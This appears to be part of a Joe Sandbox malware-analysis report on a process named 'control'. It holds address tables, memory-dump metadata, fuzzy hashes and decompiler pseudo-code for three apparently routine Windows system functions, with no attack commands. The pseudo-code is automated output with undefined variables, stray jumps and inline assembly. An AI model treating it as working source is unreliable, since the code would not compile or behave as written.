0x04d843ac
0x04d843b0
0x04d843c4
0x04d843ce
0x00000000
0x00000000
0x00000000
0x04d843ce
0x04d841bb
0x04d841bb
0x04d841bb
0x04d841bf
0x00000000
0x00000000
0x04d841c1
0x04d841c6
0x04d84402
0x04d84404
0x04d84405
0x04d8440f
0x04d84411
0x04d84414
0x04d84417
0x04d84426
0x04d84426
0x04d8442c
0x04d84419
0x04d84419
0x04d8441f
0x04d84424
0x00000000
0x00000000
0x04d84424
0x04d8442f
0x04d84437
0x04d8443b
0x04d84441
0x04d84443
0x04d84446
0x04d84448
0x04d8444d
0x04d84450
0x04d84451
0x04d84452
0x04d84454
0x04d84457
0x04d8445a
0x04d8445a
0x04d8445c
0x04d84461
0x04d84474
0x04d8447b
0x04d8447d
0x04d8447f
0x04d84482
0x04d8448b
0x04d84491
0x04d84498
0x04d84493
0x04d84493
0x04d84493
0x04d84499
0x04d8449f
0x04d844a1
0x04d844a2
0x04d844a4
0x04d844a4
0x04d844a7
0x04d844aa
0x04d844b1
0x04d844b7
0x04d84446
0x04d844ba
0x04d841cc
0x04d841cc
0x04d841d1
0x00000000
0x04d841d7
0x04d841d7
0x04d841d9
0x04d841dc
0x04d841df
0x04d841e4
0x04d841f9
0x00000000
0x04d841f9
0x04d841d1
0x00000000
0x04d841c6
0x04d84200
0x00000000
0x04d84200
0x04d84179
0x04d8417f
0x00000000
0x04d8417f
0x04d84177
0x04d84110
0x04d840ca
0x04d840ce
0x04d843dd
0x04d843dd
0x04d843e2
0x04d843e2
0x00000000
0x04d843e2
0x00000000
0x04d840c8
0x04d84401
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9dd05ce48ea691a1e601a5aef93d3465a48740f7aaf8db66524f12db7d5bf3d
Instruction ID: e5e9663511e3e03f88dac03b7a1670f698ee846012361c920e9b024fa8283402
Opcode Fuzzy Hash: f9dd05ce48ea691a1e601a5aef93d3465a48740f7aaf8db66524f12db7d5bf3d
Instruction Fuzzy Hash: C6A1CF72A04612EFD721EF28C980B6AB7EAFF48708F04456CE5859B690E774FC11CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04CCE310 Relevance: .3, Instructions: 261
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04CCE310(signed short* __ecx, signed int __edx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed short _v24;
				short _v26;
				char _v28;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t72;
				signed short _t83;
				intOrPtr _t87;
				signed short _t100;
				signed short _t110;
				signed short _t117;
				signed int _t121;
				signed int* _t122;
				unsigned int _t124;
				intOrPtr _t129;
				intOrPtr _t135;
				signed int _t136;
				signed short _t139;
				signed short _t142;
				signed short _t149;
				signed short _t155;
				signed short* _t158;
				intOrPtr _t160;
				signed int _t161;
				signed int _t163;

				_v20 = __edx;
				_t65 = __ecx;
				_v12 = __ecx;
				_v8 = 0;
				if((__edx & 0x00000020) == 0) {
					__eflags = __edx & 0x00000200;
					if((__edx & 0x00000200) == 0) {
						return 0xc0000225;
					} else {
						_t122 = _a8;
						_t159 = E04CCF380(0, __ecx, __edx, _t122,  &_v8);
						goto L17;
					}
				} else {
					if(__ecx == 0) {
						_t135 =  *4;
						_t161 =  *0 & 0x0000ffff;
						_t36 = _t135 - 2; // 0x2
						_t149 = _t36 + _t161;
						__eflags = _t149 - _t135;
						if(_t149 > _t135) {
							while(1) {
								_t121 =  *_t149 & 0x0000ffff;
								__eflags = _t121 - 0x5c;
								if(_t121 == 0x5c) {
									break;
								}
								__eflags = _t121 - 0x2f;
								if(_t121 == 0x2f) {
									break;
								} else {
									_t149 = _t149 - 2;
									__eflags = _t149 - _t135;
									if(_t149 > _t135) {
										continue;
									} else {
									}
								}
								goto L43;
							}
							_t149 = _t149 + 2;
							__eflags = _t149;
						}
						L43:
						_v24 = _t149;
						_t136 = _t149 -  *4 & 0x0000ffff;
						_v28 = _t161 - _t136;
						_v26 =  *2 - _t136;
						_t65 =  &_v28;
						_v12 = _t65;
					}
					_t163 = 0;
					if(_t65 == 0) {
						L47:
						_t163 = 0x80000000;
					} else {
						_t124 = ( *_t65 & 0x0000ffff) >> 1;
						_t158 =  *(_t65 + 4);
						if(_t124 != 0) {
							do {
								_t110 =  *_t158 & 0x0000ffff;
								_t158 =  &(_t158[1]);
								_t124 = _t124 - 1;
								_v16 = _t110;
								if(_t110 >= 0x61) {
									if(_t110 > 0x7a) {
										_t139 =  *0x4da6914; // 0x7f560654
										__eflags = _t139;
										if(_t139 != 0) {
											__eflags = _t110 - 0xc0;
											if(_t110 >= 0xc0) {
												_t153 = _t110 & 0x0000ffff;
												_t117 =  *0x4da6914; // 0x7f560654
												_t142 =  *0x4da6914; // 0x7f560654
												_t110 =  *((intOrPtr*)(_t142 + (( *(_t117 + (( *(_t139 + ((_t110 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t153 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t153 & 0x0000000f)) * 2)) + _v16;
											}
										}
									} else {
										_t110 = _t110 + 0xffffffe0;
									}
								}
								_t65 = _t110 & 0xffff;
								_t163 = _t163 * 0x1003f + (_t110 & 0xffff);
							} while (_t124 != 0);
						}
						if(_t163 == 0) {
							goto L47;
						}
					}
					L04CC2330(_t65, 0x4da6668);
					_t122 = _a8;
					_t157 = _v12;
					_t159 = E04CCDF70(_v12, 0, _v20, _t122, _t163);
					if(_t159 >= 0) {
						_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_t122 + 0x50)) + 0x20));
					}
					E04CC24D0(0x4da6668);
					if(_t159 < 0) {
						_v12 = 0;
					} else {
						_v12 = 1;
					}
					if(E04CC3C40() != 0) {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t67 = 0x7ffe0384;
					}
					if( *_t67 != 0) {
						_t67 =  *[fs:0x30];
						__eflags =  *(_t67 + 0x240) & 0x00000004;
						if(( *(_t67 + 0x240) & 0x00000004) != 0) {
							_t100 = E04CC3C40();
							__eflags = _t100;
							if(_t100 == 0) {
								_t67 = 0x7ffe0385;
							} else {
								_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t67 & 0x00000020;
							if(( *_t67 & 0x00000020) != 0) {
								__eflags = _v12;
								_t67 = E04D30227(0x14a0, 0, 0, (_t67 & 0xffffff00 | _v12 != 0x00000000) - 0x00000001 & 3, _t157, 0);
							}
						}
					}
				}
				L17:
				if(_t159 >= 0) {
					_t155 = 0xc0000225;
					if(_v8 != 9) {
						L34:
						E04CCD3E1(_t122,  *_t122, _t159);
						 *_t122 = 0;
						goto L25;
					} else {
						_t159 =  *_t122;
						_t155 = 0;
						L04CC2330(_t67, 0x4da6668);
						_t129 =  *((intOrPtr*)( *_t122 + 0x50));
						_t72 =  *((intOrPtr*)(_t129 + 0xc));
						if(_t72 != 0xffffffff) {
							if(_t72 == 0) {
								_t87 =  *[fs:0x18];
								__eflags =  *(_t87 + 0xfca) & 0x00001000;
								if(( *(_t87 + 0xfca) & 0x00001000) == 0) {
									_t155 = 0xc0000135;
								} else {
									 *((intOrPtr*)(_t129 + 0x10)) =  *((intOrPtr*)(_t129 + 0x10)) + 1;
								}
							} else {
								 *((intOrPtr*)(_t129 + 0xc)) = _t72 + 1;
							}
						}
						E04CC24D0(0x4da6668);
						if(_t155 < 0) {
							goto L34;
						}
						_t160 = _a4;
						_t74 =  *_t122;
						_v20 =  *_t122;
						_v16 = 0;
						if(_t160 != 0) {
							L04CC2330(_t74, 0x4da6668);
							__eflags =  *( *((intOrPtr*)(_t160 + 0x50)) + 0xc);
							if(__eflags == 0) {
								__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
								if(__eflags != 0) {
									goto L28;
								}
								_t155 = 0xc0000135;
								L29:
								E04CC24D0(0x4da6668);
								goto L24;
							}
							L28:
							E04CCF143(_t160, _v20, __eflags, 0,  &_v16);
							_t155 = _v16;
							goto L29;
						}
						L24:
						if(_t155 < 0) {
							_t83 =  *( *[fs:0x18] + 0xfca) & 0x00001000;
							__eflags = _t83;
							_t159 = _t83 & 0x0000ffff;
							if(_t83 == 0) {
								__eflags = 0;
								E04CD19DF(0);
							}
							E04CD96C7( *_t122, 0);
							__eflags = _t159;
							if(_t159 == 0) {
								E04CE79F9();
							}
							__eflags = _t155;
							if(_t155 >= 0) {
								goto L25;
							} else {
								goto L34;
							}
						}
						L25:
						return _t155;
					}
				}
				return _t159;
				goto L65;
			}

0x04cce318
0x04cce31b
0x04cce31d
0x04cce320
0x04cce32d
0x04cce48b
0x04cce491
0x00000000
0x04cce497
0x04cce497
0x04cce4a9
0x00000000
0x04cce4a9
0x04cce333
0x04cce335
0x04d196d0
0x04d196d6
0x04d196df
0x04d196e2
0x04d196e4
0x04d196e6
0x04d196e8
0x04d196e8
0x04d196eb
0x04d196ee
0x00000000
0x00000000
0x04d196f0
0x04d196f3
0x00000000
0x04d196f5
0x04d196f5
0x04d196f8
0x04d196fa
0x00000000
0x00000000
0x04d196fc
0x04d196fa
0x00000000
0x04d196f3
0x04d196fe
0x04d196fe
0x04d196fe
0x04d19701
0x04d19704
0x04d1970e
0x04d1971c
0x04d19720
0x04d19724
0x04d19727
0x04d19727
0x04cce33b
0x04cce33f
0x04d19782
0x04d19782
0x04cce345
0x04cce348
0x04cce34a
0x04cce34d
0x04cce350
0x04cce350
0x04cce353
0x04cce356
0x04cce357
0x04cce35d
0x04cce362
0x04d1972f
0x04d19735
0x04d19737
0x04d19742
0x04d19745
0x04d1974b
0x04d19764
0x04d1976d
0x04d19779
0x04d19779
0x04d19745
0x04cce368
0x04cce368
0x04cce368
0x04cce362
0x04cce374
0x04cce377
0x04cce379
0x04cce350
0x04cce37f
0x00000000
0x00000000
0x04cce37f
0x04cce38a
0x04cce38f
0x04cce394
0x04cce3a3
0x04cce3a7
0x04cce3b1
0x04cce3b1
0x04cce3b9
0x04cce3c0
0x04cce4bb
0x04cce3c6
0x04cce3c6
0x04cce3c6
0x04cce3d4
0x04d19795
0x04cce3da
0x04cce3da
0x04cce3da
0x04cce3e2
0x04d1979f
0x04d197a5
0x04d197ac
0x04d197b2
0x04d197b7
0x04d197b9
0x04d197cb
0x04d197bb
0x04d197c4
0x04d197c4
0x04d197d0
0x04d197d3
0x04d197d9
0x04d197f4
0x04d197f4
0x04d197d3
0x04d197ac
0x04cce3e2
0x04cce3e8
0x04cce3ea
0x04cce3f4
0x04cce3f9
0x04cce4c7
0x04cce4c9
0x04cce4ce
0x00000000
0x04cce3ff
0x04cce3ff
0x04cce401
0x04cce408
0x04cce40d
0x04cce410
0x04cce416
0x04cce41a
0x04d197fe
0x04d19809
0x04d19810
0x04d1981a
0x04d19812
0x04d19812
0x04d19812
0x04cce420
0x04cce421
0x04cce421
0x04cce41a
0x04cce429
0x04cce430
0x00000000
0x00000000
0x04cce436
0x04cce43b
0x04cce43d
0x04cce440
0x04cce445
0x04cce45f
0x04cce467
0x04cce46a
0x04cce4e4
0x04cce4eb
0x00000000
0x00000000
0x04cce4f1
0x04cce47f
0x04cce484
0x00000000
0x04cce484
0x04cce46c
0x04cce477
0x04cce47c
0x00000000
0x04cce47c
0x04cce447
0x04cce449
0x04d19836
0x04d19836
0x04d19839
0x04d1983c
0x04d1983e
0x04d19840
0x04d19840
0x04d19849
0x04d1984e
0x04d19851
0x04d19853
0x04d19853
0x04d19858
0x04d1985a
0x00000000
0x04d19860
0x00000000
0x04d19860
0x04d1985a
0x04cce44f
0x00000000
0x04cce44f
0x04cce3f9
0x04cce4b8
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9d2a1e5afac755951323dd780d4eac430226664b06a52a6a8714acc689271ac
Instruction ID: 97e8ac3da6c558bebc4a087fbb9bb82ba78b962fa8c012e969227bcc71f3bacd
Opcode Fuzzy Hash: d9d2a1e5afac755951323dd780d4eac430226664b06a52a6a8714acc689271ac
Instruction Fuzzy Hash: 2B913176A00610DBE720DB69D490B7EB7A2FF85714F0D40ADED059B290EB34F941DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D7A6C0 Relevance: .2, Instructions: 222
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E04D7A6C0(signed char* __ecx, signed int __edx, signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				void* __ebx;
				void* __esi;
				intOrPtr _t84;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t104;
				char _t110;
				signed int _t112;
				char* _t113;
				char _t117;
				intOrPtr* _t135;
				signed int _t136;
				unsigned int _t139;
				signed int _t152;
				signed int _t158;
				signed char _t159;
				unsigned int _t171;
				signed int _t175;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed char* _t196;
				intOrPtr* _t202;

				_t135 = _a8;
				_t196 = __ecx;
				_t84 =  *((intOrPtr*)(_t135 + 0x10));
				_t190 = __edx;
				_v28 = __edx;
				_t171 =  *((intOrPtr*)(_t135 + 4)) + 0xfff >> 0xc;
				_v40 = __ecx;
				_t139 = _t84 + 0xfff >> 0xc;
				_v16 = _t139;
				_v16 = _v16 << 0xc;
				_v36 = _t171;
				_v32 = _t139;
				if(_v16 >= _t84) {
					__eflags = _t139 - _t171;
					if(_t139 > _t171) {
						L36:
						__eflags = _t190 & 0x02000000;
						if((_t190 & 0x02000000) != 0) {
							goto L1;
						}
						_t191 = E04D799CA(_t196, _a4, _t135, _t190);
						L38:
						return _t191;
					}
					_v20 = __ecx[4];
					__eflags =  *__ecx >> 8 - 2;
					if( *__ecx >> 8 < 2) {
						L5:
						__eflags =  *(_t196 + 0xc) & 0x04000000;
						if(( *(_t196 + 0xc) & 0x04000000) != 0) {
							goto L36;
						} else {
							E04D07B54(_t196, _t190);
							_t91 = _t196 + 0x44;
							__eflags =  *(_t91 + 4) & 0x00000001;
							_t136 =  *_t91;
							if(( *(_t91 + 4) & 0x00000001) != 0) {
								__eflags = _t136;
								if(_t136 == 0) {
									_t136 = 0;
									__eflags = 0;
								} else {
									_t136 = _t136 ^ _t91;
								}
							}
							_t92 = _a4;
							_t175 =  *(_t91 + 4) & 1;
							while(1) {
								__eflags = _t136;
								if(_t136 == 0) {
									break;
								}
								_t143 =  *(_t136 + 0xc) & 0xffff0000;
								__eflags = _t92 - ( *(_t136 + 0xc) & 0xffff0000);
								if(__eflags < 0) {
									_t143 =  *_t136;
									L15:
									__eflags = _t175;
									if(_t175 == 0) {
										L18:
										_t136 = _t143;
										continue;
									}
									__eflags = _t143;
									if(_t143 == 0) {
										goto L18;
									}
									_t136 = _t136 ^ _t143;
									continue;
								}
								if(__eflags <= 0) {
									break;
								}
								_t143 =  *(_t136 + 4);
								goto L15;
							}
							__eflags = _t136;
							if(_t136 != 0) {
								_t192 =  *(_t136 + 0x10);
								_t29 = (1 << (_t192 >> 0x00000002 & 0x0000003f)) - 1; // 0x0
								_t202 = _v40;
								_v20 = ((_t192 >> 0x00000001 & 0x00000001) + (_t192 >> 0xc) << 0xc) - 1 + (1 << (_t192 >> 0x00000002 & 0x0000003f)) - (((_t192 >> 0x00000001 & 0x00000001) + (_t192 >> 0x0000000c) << 0x0000000c) - 0x00000001 + 1 & _t29);
								 *(_t136 + 0x10) = _t192 & 0x00000fff | _v32 << 0x0000000c;
								_t195 = _v28;
								 *(_t136 + 0xc) = (_v32 << 0xc) -  *((intOrPtr*)(_a8 + 0xc));
								E04D07B8C(_t202, _v28, _a8);
								_t104 = _a8;
								__eflags =  *(_t104 + 8);
								if( *(_t104 + 8) == 0) {
									_t191 = _a4;
								} else {
									_t191 = _a4;
									E04D785B0(_t191,  *_t104, _t202, _t191,  *((intOrPtr*)(_t104 + 0xc)), _t195);
								}
								_t152 = _v32;
								__eflags = _t152 - _v36;
								if(_t152 < _v36) {
									_push( *((intOrPtr*)(_t202 + 4)));
									_push( *_t202);
									_t110 = (( *(_t136 + 0x10) >> 0x00000001 & 0x00000001) + _t152 << 0xc) + _t191;
									_v12 = _t110;
									_v8 = _v20 - _t110 + _t191;
									_push(0x8000);
									E04D78845( &_v12,  &_v8);
									_t112 = E04CC3C40();
									__eflags = _t112;
									if(_t112 == 0) {
										_t113 = 0x7ffe0388;
									} else {
										_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
									}
									__eflags =  *_t113;
									if( *_t113 != 0) {
										E04D6DA30(_t136, _t202, _v12, _v8);
									}
									_v20 = _v20 - _v8;
									_t117 = _v16 + _t191;
									_t158 = _v12 - _t117;
									__eflags = _t158;
									_v12 = _t117;
									_v8 = _t158;
									if(_t158 != 0) {
										_push( *((intOrPtr*)(_t202 + 4)));
										_push( *_t202);
										_push(0x4000);
										E04D78845( &_v12,  &_v8);
									}
									_t159 = _v20;
									asm("bsf ecx, ecx");
									_v40 = _t159;
									__eflags = _t159 - ( *(_t136 + 0x10) >> 0x00000002 & 0x0000003f);
									if(_t159 != ( *(_t136 + 0x10) >> 0x00000002 & 0x0000003f)) {
										E04D07B54(_t202, _v28);
										_t75 = _t136 + 0x10;
										 *_t75 =  *(_t136 + 0x10) ^ (_v40 << 0x00000002 ^  *(_t136 + 0x10)) & 0x000000fc;
										__eflags =  *_t75;
										E04D07B8C(_t202, _v28, _v40);
									}
									asm("lock xadd [eax], ecx");
									asm("lock xadd [eax], edx");
								}
							} else {
								E04D07B8C(_t196, _t190, _t143);
								_t191 = _t190 | 0xffffffff;
							}
							goto L38;
						}
					}
					__eflags =  *__ecx & 0x00000006;
					if(( *__ecx & 0x00000006) == 0) {
						goto L36;
					}
					goto L5;
				}
				L1:
				_t191 = 0;
				goto L38;
			}

0x04d7a6c9
0x04d7a6cd
0x04d7a6d0
0x04d7a6d3
0x04d7a6de
0x04d7a6e1
0x04d7a6ea
0x04d7a6ed
0x04d7a6f0
0x04d7a6f3
0x04d7a6f7
0x04d7a6fa
0x04d7a700
0x04d7a709
0x04d7a70b
0x04d7a917
0x04d7a917
0x04d7a91d
0x00000000
0x00000000
0x04d7a92f
0x04d7a931
0x04d7a937
0x04d7a937
0x04d7a714
0x04d7a71c
0x04d7a71e
0x04d7a729
0x04d7a729
0x04d7a730
0x00000000
0x04d7a736
0x04d7a73a
0x04d7a73f
0x04d7a742
0x04d7a746
0x04d7a748
0x04d7a74a
0x04d7a74c
0x04d7a752
0x04d7a752
0x04d7a74e
0x04d7a74e
0x04d7a74e
0x04d7a74c
0x04d7a758
0x04d7a75b
0x04d7a784
0x04d7a784
0x04d7a786
0x00000000
0x00000000
0x04d7a763
0x04d7a769
0x04d7a76b
0x04d7a774
0x04d7a776
0x04d7a776
0x04d7a778
0x04d7a782
0x04d7a782
0x00000000
0x04d7a782
0x04d7a77a
0x04d7a77c
0x00000000
0x00000000
0x04d7a77e
0x00000000
0x04d7a77e
0x04d7a76d
0x00000000
0x00000000
0x04d7a76f
0x00000000
0x04d7a76f
0x04d7a788
0x04d7a78a
0x04d7a79e
0x04d7a7c5
0x04d7a7d2
0x04d7a7dc
0x04d7a7ea
0x04d7a7ed
0x04d7a7fc
0x04d7a800
0x04d7a805
0x04d7a808
0x04d7a80c
0x04d7a821
0x04d7a80e
0x04d7a814
0x04d7a81a
0x04d7a81a
0x04d7a824
0x04d7a827
0x04d7a82a
0x04d7a836
0x04d7a83b
0x04d7a848
0x04d7a84c
0x04d7a851
0x04d7a857
0x04d7a85c
0x04d7a861
0x04d7a866
0x04d7a868
0x04d7a87a
0x04d7a86a
0x04d7a873
0x04d7a873
0x04d7a87f
0x04d7a882
0x04d7a88c
0x04d7a88c
0x04d7a89a
0x04d7a8a0
0x04d7a8a2
0x04d7a8a2
0x04d7a8a4
0x04d7a8a7
0x04d7a8aa
0x04d7a8ac
0x04d7a8b2
0x04d7a8b7
0x04d7a8bc
0x04d7a8bc
0x04d7a8c1
0x04d7a8c7
0x04d7a8d0
0x04d7a8d3
0x04d7a8d5
0x04d7a8dc
0x04d7a8f4
0x04d7a8f4
0x04d7a8f4
0x04d7a8fa
0x04d7a8fa
0x04d7a90a
0x04d7a911
0x04d7a911
0x04d7a78c
0x04d7a791
0x04d7a796
0x04d7a796
0x00000000
0x04d7a78a
0x04d7a730
0x04d7a720
0x04d7a723
0x00000000
0x00000000
0x00000000
0x04d7a723
0x04d7a702
0x04d7a702
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
Instruction ID: 021d38d04b5c2641db890af517b729c767519422ab7b83c4c5aaabf088374847
Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
Instruction Fuzzy Hash: 4C816C31B002199FDF18CF99C880AAEB7B2FF84314F198569D8569B384E774EA02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04CDCFB0 Relevance: .2, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E04CDCFB0(short* _a4, signed int* _a8, intOrPtr* _a12) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				short _v46;
				unsigned int _v48;
				char _v56;
				void* _t71;
				signed int _t75;
				signed int _t76;
				void* _t77;
				signed int _t78;
				signed int _t82;
				signed int* _t84;
				char* _t93;
				signed int _t95;
				intOrPtr* _t99;
				signed int* _t104;
				signed int _t105;
				signed int _t106;
				signed int _t108;
				short _t109;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t118;
				signed int _t125;
				signed int* _t126;
				signed int* _t127;
				signed int _t128;
				void* _t129;
				void* _t130;
				signed int _t133;
				signed int _t135;

				_t93 =  *((intOrPtr*)( *[fs:0x30] + 0x470));
				if(_t93 == 0 ||  *_t93 == 0) {
					_t71 = E04CDD051(_a4, _a8);
					goto L8;
				} else {
					_t133 =  *((intOrPtr*)(_t93 + 4));
					_v28 = _t133;
					asm("lock or [eax], ecx");
					_t99 = _a12;
					_t75 =  *( *[fs:0x30] + 0x474) & 0x00000001;
					_v12 = _t75;
					if(_t99 != 0) {
						_v16 =  *_t99;
						_v20 =  *((intOrPtr*)(_t99 + 4));
					} else {
						_v16 = 0;
						_v20 = 0;
					}
					if(_t75 != 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						__eflags = _v48 >> 0x10 - 0x3c;
						if(_v48 >> 0x10 == 0x3c) {
							_t109 = 0x3b;
							_t82 = _t75 | 0x00000002;
							__eflags = _t82;
							_v46 = _t109;
							_v12 = _t82;
						}
						_t76 = E04CDD051( &_v56,  &_v40);
						__eflags = _t76;
						if(_t76 == 0) {
							goto L10;
						}
						_v32 = _v32 & 0x00000000;
						_t77 = 0x989680;
						__eflags = _v28;
						_t135 = _v36;
						_t118 = _v40;
						if(_v28 <= 0) {
							L36:
							_t78 = _v12;
							L37:
							__eflags = _t78 & 0x00000002;
							if((_t78 & 0x00000002) == 0) {
								goto L7;
							}
							__eflags = _t78 - 4;
							if(_t78 < 4) {
								goto L10;
							}
							_t118 = _t118 + 0x989680;
							asm("adc esi, 0x0");
							goto L7;
						}
						_t95 = _t93 + 8;
						__eflags = _t95;
						do {
							_t105 =  *(_t95 + 4);
							_t125 =  *_t95;
							__eflags = _t105;
							if(__eflags < 0) {
								L23:
								_t106 = _t105 & 0x7fffffff;
								_t126 = _t125 - _v16;
								_v24 = _t126;
								asm("sbb ecx, [ebp-0x10]");
								_v24 = _v24 + _t77;
								asm("adc eax, 0x0");
								__eflags = _t135 - _t106;
								if(__eflags < 0) {
									L33:
									__eflags = _t135 - _t106;
									if(__eflags > 0) {
										goto L10;
									}
									if(__eflags < 0) {
										goto L36;
									}
									__eflags = _t118 - _t126;
									if(_t118 >= _t126) {
										goto L10;
									}
									goto L36;
								}
								if(__eflags > 0) {
									L26:
									_t77 = 0x989680;
									_t118 = _t118 - 0x989680;
									asm("sbb esi, 0x0");
									goto L27;
								}
								__eflags = _t118 - _v24;
								if(_t118 < _v24) {
									goto L33;
								}
								goto L26;
							}
							if(__eflags > 0) {
								L19:
								_t127 = _t125 - _v16;
								_v24 = _t127;
								asm("sbb ecx, [ebp-0x10]");
								_v24 = _v24 + _t77;
								asm("adc eax, 0x0");
								__eflags = _t135 - _t105;
								if(__eflags < 0) {
									L29:
									__eflags = _t135 - _t105;
									if(__eflags < 0) {
										goto L36;
									}
									if(__eflags > 0) {
										L32:
										_t78 = _v12 | 0x00000004;
										goto L37;
									}
									__eflags = _t118 - _t127;
									if(_t118 < _t127) {
										goto L36;
									}
									goto L32;
								}
								if(__eflags > 0) {
									L22:
									_t77 = 0x989680;
									_t118 = _t118 + 0x989680;
									asm("adc esi, 0x0");
									goto L27;
								}
								__eflags = _t118 - _v24;
								if(_t118 < _v24) {
									goto L29;
								}
								goto L22;
							}
							__eflags = _t125;
							if(_t125 < 0) {
								goto L23;
							}
							goto L19;
							L27:
							_t95 = _t95 + 8;
							_t108 = _v32 + 1;
							_v32 = _t108;
							__eflags = _t108 - _v28;
						} while (_t108 < _v28);
						goto L36;
					} else {
						if(E04CDD051(_a4,  &_v40) == 0) {
							L10:
							_t71 = 0;
							L8:
							return _t71;
						}
						_t118 = _v40;
						_t135 = _v36;
						_v32 = 0;
						if(_t133 != 0) {
							_t84 = _t93 + 8;
							_v24 = _t84;
							do {
								_t111 = _t84[1];
								_t128 =  *_t84;
								__eflags = _t111;
								if(__eflags < 0) {
									L52:
									_t112 = _t111 & 0x7fffffff;
									_t129 = _t128 - _v16;
									asm("sbb ecx, [ebp-0x10]");
									_v12 = _t129 + 0x989680;
									asm("adc eax, 0x0");
									__eflags = _t135 - _t112;
									if(__eflags < 0) {
										L58:
										__eflags = _t135 - _t112;
										if(__eflags > 0) {
											goto L10;
										}
										if(__eflags < 0) {
											goto L7;
										}
										__eflags = _t118 - _t129;
										if(_t118 >= _t129) {
											goto L10;
										}
										goto L7;
									}
									if(__eflags > 0) {
										L55:
										_t118 = _t118 - 0x989680;
										asm("sbb esi, 0x0");
										goto L56;
									}
									__eflags = _t118 - _v12;
									if(_t118 < _v12) {
										goto L58;
									}
									goto L55;
								}
								if(__eflags > 0) {
									L44:
									_t130 = _t128 - _v16;
									asm("sbb ecx, [ebp-0x10]");
									_v12 = _t130 + 0x989680;
									asm("adc eax, 0x0");
									__eflags = _t135 - _t111;
									if(__eflags < 0) {
										L48:
										__eflags = _t135 - _t111;
										if(__eflags < 0) {
											goto L7;
										}
										if(__eflags > 0) {
											L51:
											_t135 = (_t135 << 0x00000020 | _t118) << 1;
											_t118 = _t118 + _t118 - _t130;
											asm("sbb esi, ecx");
											goto L56;
										}
										__eflags = _t118 - _t130;
										if(_t118 < _t130) {
											goto L7;
										}
										goto L51;
									}
									if(__eflags > 0) {
										L47:
										_t118 = _t118 + 0x989680;
										asm("adc esi, 0x0");
										goto L56;
									}
									__eflags = _t118 - _v12;
									if(_t118 < _v12) {
										goto L48;
									}
									goto L47;
								}
								__eflags = _t128;
								if(_t128 < 0) {
									goto L52;
								}
								goto L44;
								L56:
								_t114 = _v32 + 1;
								_t84 =  &(_v24[2]);
								_v32 = _t114;
								_v24 = _t84;
								__eflags = _t114 - _v28;
							} while (_t114 < _v28);
						}
						L7:
						_t104 = _a8;
						_t71 = 1;
						 *_t104 = _t118;
						_t104[1] = _t135;
						goto L8;
					}
				}
			}

0x04cdcfbf
0x04cdcfc9
0x04d1ecd3
0x00000000
0x04cdcfd8
0x04cdcfd8
0x04cdcfde
0x04cdcfe3
0x04cdcfee
0x04cdcff7
0x04cdcffa
0x04cdcfff
0x04cdd045
0x04cdd048
0x04cdd001
0x04cdd001
0x04cdd004
0x04cdd004
0x04cdd009
0x04d1eb0a
0x04d1eb0b
0x04d1eb0c
0x04d1eb0d
0x04d1eb14
0x04d1eb18
0x04d1eb1c
0x04d1eb1d
0x04d1eb1d
0x04d1eb20
0x04d1eb24
0x04d1eb24
0x04d1eb2d
0x04d1eb32
0x04d1eb34
0x00000000
0x00000000
0x04d1eb3a
0x04d1eb3e
0x04d1eb43
0x04d1eb47
0x04d1eb4a
0x04d1eb4d
0x04d1ebee
0x04d1ebee
0x04d1ebf1
0x04d1ebf1
0x04d1ebf3
0x00000000
0x00000000
